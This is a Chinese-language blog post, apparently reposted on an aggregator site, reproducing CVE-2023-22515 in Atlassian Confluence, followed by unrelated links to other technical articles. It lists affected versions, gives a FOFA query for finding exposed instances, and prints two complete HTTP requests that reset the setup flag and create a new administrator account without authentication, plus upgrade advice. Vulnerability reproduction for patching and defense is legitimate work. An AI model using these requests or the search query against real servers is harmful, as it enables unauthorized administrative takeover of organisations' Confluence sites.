CVE-2023-22515:Atlassian Confluence权限提升漏洞复现 [附POC]

文章目录

  • Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

Atlassian Confluence权限提升(CVE-2023-22515)漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

Atlassian Confluence Data Center 和 Confluence Server 存在权限提升漏洞,该漏洞由属性覆盖导致,未经身份验证的远程攻击者可以重新执行 Confluence 安装流程并增加管理员账户,从而访问 Confluence 实例。

0x03 影响版本

Confluence Data Center、Confluence Server <= 8.0.4
Confluence Data Center、Confluence Server <= 8.1.4
Confluence Data Center、Confluence Server <= 8.2.3
Confluence Data Center、Confluence Server <= 8.3.2
Confluence Data Center、Confluence Server <= 8.4.2
Confluence Data Center、Confluence Server <= 8.5.1

0x04 漏洞环境

FOFA语法:app=“ATLASSIAN-Confluence”
根据版本精确查询:

body="<span id='footer-build-information'>8.0.0</span>"

在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC1:(GET)
覆盖 Confluence 服务器 bootstrapStatusProvider.applicationConfig.setupComplete 属性

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

POC2:(POST)

开始新建管理员账户(请求头添加:X-Atlassian-Token: no-check)

POST /setup/setupadministrator.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Content-Length: 107username=cs&fullName=cs&email=yj%40yjtest.com&password=cstest&confirm=cstest&setup-next-button=Next

3.复现

1.覆盖 Confluence 服务器 bootstrapStatusProvider.applicationConfig.setupComplete 属性,出现以下截图属性覆盖成功。
在这里插入图片描述2.开始新建管理员账户(请求头添加:X-Atlassian-Token: no-check)
出现以下截图则添加成功。
在这里插入图片描述3.直接用添加成功的账号密码登录
重新访问登录主页,点击statr
在这里插入图片描述使用新建的用户名以及密码登录,成功登录。
在这里插入图片描述

0x06 修复建议

更新 Confluence Data Center、Confluence Server 至安全版本:

https://www.atlassian.com/software/confluence/download-archives

安全版本

Confluence Data Center、Confluence Server >= 8.3.3
Confluence Data Center、Confluence Server >= 8.4.3
Confluence Data Center、Confluence Server >= 8.5.2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/168022.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue中下载文件后无法打开的坑

今天在项目开发的时候临时要添加个导出功能我就写了一份请求加导出得代码&#xff0c; 代码&#xff1a; //导出按钮放开exportDutySummarizing (dataRangeInfo) {const params {departmentName: dataRangeInfo.name,departmentQode: dataRangeInfo.qode}//拼接所需得urlcons…

UserRole

Qt::UserRole 是 Qt::ItemDataRole 枚举中的一个成员&#xff0c;用于表示自定义数据角色&#xff08;Data Role&#xff09;的起始值。 在 Qt 中&#xff0c;Qt::ItemDataRole 枚举用于标识项&#xff08;Item&#xff09;中不同类型的数据。这些数据角色包括 Qt::DisplayRol…

目标检测YOLO系列从入门到精通技术详解100篇-【目标检测】红外热成像

目录 前言 知识储备 红外热成像仪基础知识 算法原理 红外热成像探测距离 红外图像增强

第一百七十八回 介绍一个三方包组件:SlideSwitch

文章目录 1. 概念介绍2. 使用方法3. 代码与效果3.1 示例代码3.2 运行效果 4. 内容总结 我们在上一章回中介绍了"如何创建垂直方向的Switch"相关的内容&#xff0c;本章回中将 介绍SlideSwitch组件.闲话休提&#xff0c;让我们一起Talk Flutter吧。 1. 概念介绍 我们…

多功能智能灯杆主要功能有哪些?

多功能智能灯杆这个词相信大家都不陌生&#xff0c;最近几年多功能智能灯杆行业发展迅速&#xff0c;迅速取代了传统路灯&#xff0c;那么多功能智能灯杆相比传统照明路灯好在哪里呢&#xff0c;为什么大家都选择使用叁仟智慧多功能智能灯杆呢&#xff1f;所谓多功能智能灯杆着…

【libGDX】Mesh纹理贴图

1 前言 纹理贴图的本质是将图片的纹理坐标与模型的顶点坐标建立一一映射关系。纹理坐标的 x、y 轴正方向分别朝右和朝下&#xff0c;如下。 2 纹理贴图 本节将使用 Mesh、ShaderProgram、Shader 实现纹理贴图&#xff0c;OpenGL ES 的实现见博客 → 纹理贴图。 DesktopLauncher…

超级应用平台(HAP)起航

各位明道云用户和伙伴&#xff0c; 今天&#xff0c;我们正式发布明道云10.0版本。从这个版本开始&#xff0c;我们将产品名称正式命名为超级应用平台&#xff08;Hyper Application Platform, 简称HAP&#xff09;。我们用“超级”二字表达产品在综合能力方面的突破&#xff…

清华系下一代 LCM

LCM LoRA模型是一种创新的深度学习模型&#xff0c;它通过特殊的技术手段&#xff0c;显著提高了图像生成的效率。这种模型特别适用于需要快速生成高质量图像的场景&#xff0c;如艺术创作、实时图像处理等。 GitHub - luosiallen/latent-consistency-model: Latent Consistenc…

视频监控中的智能算法与计算机视觉技术

智能视频监控是一种基于人工智能技术的监控系统&#xff0c;它能够通过对图像和视频数据进行分析&#xff0c;自动识别目标物体、判断其行为以及进行异常检测等功能&#xff0c;从而实现对场景的智能化监管。以下是常见的一些用于智能视频监控的算法&#xff1a; 1、人脸识别技…

RabbitMQ简易安装

一般来说安装 RabbitMQ 之前要安装 Erlang &#xff0c;可以去Erlang官网下载。接着去RabbitMQ官网下载安装包&#xff0c;之后解压缩即可。 Erlang官方下载地址&#xff1a;Downloads - Erlang/OTP RabbitMQ官方下载地址&#xff1a;Downloading and Installing RabbitMQ —…

org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder

密码&#xff0c;加密&#xff0c;解密 spring-security-crypto-5.7.3.jar /** Copyright 2002-2011 the original author or authors.** Licensed under the Apache License, Version 2.0 (the "License");* you may not use this file except in compliance with t…

Kafka(一)

一&#xff1a;简介 解决高吞吐量项目的需求 是一款为大数据而生的消息中间件&#xff0c;具有百亿级tps的吞吐量&#xff0c;在数据采集、传输、存储的过程中发挥着作用 二&#xff1a;为什么要使用消息队列 一个普通访问量的接口和一个大并发的接口&#xff0c;它们背后的…

C/C++---------------LeetCode第1512. 好数对的数目

好数对的数目 题目及要求暴力算法哈希算法在main内使用 题目及要求 给你一个整数数组 nums 。 如果一组数字 (i,j) 满足 nums[i] nums[j] 且 i < j &#xff0c;就可以认为这是一组 好数对 。 返回好数对的数目。 示例 1&#xff1a; 输入&#xff1a;nums [1,2,3,1,…

376.摆动序列

原题链接&#xff1a;376.摆动序列 全代码&#xff1a; class Solution { public:int wiggleMaxLength(vector<int>& nums) {if (nums.size() < 1) return nums.size();int curDiff 0; // 当前一对差值int preDiff 0; // 前一对差值int result 1; // 记录峰…

Android骨架图

用法&#xff1a;在图片上实现动画效果 <FrameLayoutandroid:id"id/image_container"android:layout_width"match_parent"android:layout_height"wrap_content"><ImageViewandroid:id"id/ivBlank"android:layout_width"…

PostgreSQL Patroni 3.0 新功能规划 2023年 纽约PG 大会 (音译)

开头还是介绍一下群&#xff0c;如果感兴趣PolarDB ,MongoDB ,MySQL ,PostgreSQL ,Redis, Oceanbase, Sql Server等有问题&#xff0c;有需求都可以加群群内有各大数据库行业大咖&#xff0c;CTO&#xff0c;可以解决你的问题。加群请联系 liuaustin3 &#xff0c;&#xff08;…

React Hooks函数之useRef

useRef 是 React 中常用的 Hook 之一&#xff0c;它返回一个可变的 ref 对象&#xff0c;其 .current 属性被初始化为传入的参数&#xff08;initialValue&#xff09;。返回的 ref 对象在组件的整个生命周期内保持不变。 以下是一些使用 useRef 的场景和示例&#xff1a; 1、…

Mathorcup数学建模竞赛第一届-【妈妈杯】B题:图像识别

目录 知识储备 传统图像处理方法进行瑕疵检测 传统算法方向的选择 瑕疵检测关注的两个问题 瑕疵的标注

【技术分享】RK3399 Ubuntu通过Python实现录音和播放功能

​本文基于IDO-SBC3968 Ubuntu 系统通过Python脚本实现录音和播放功能。 IDO-SBC3968采用RK3399国产六核64位CPU高性能处理器&#xff0c;支持4K HDMI2.0显示&#xff0c;接口丰富&#xff0c;拥有千兆以太网&#xff0c;全协议TypeC接口&#xff0c;USB3.0 &#xff0c;eDP 和…

Redis高并发缓存架构

前言&#xff1a; 针对缓存我们并不陌生&#xff0c;而今天所讲的是使用redis作为缓存工具进行缓存数据。redis缓存是将数据保存在内存中的&#xff0c;而内存的珍贵性是不可否认的。所以在缓存之前&#xff0c;我们需要明确缓存的对象&#xff0c;是否有必要缓存&#xff0c;怎…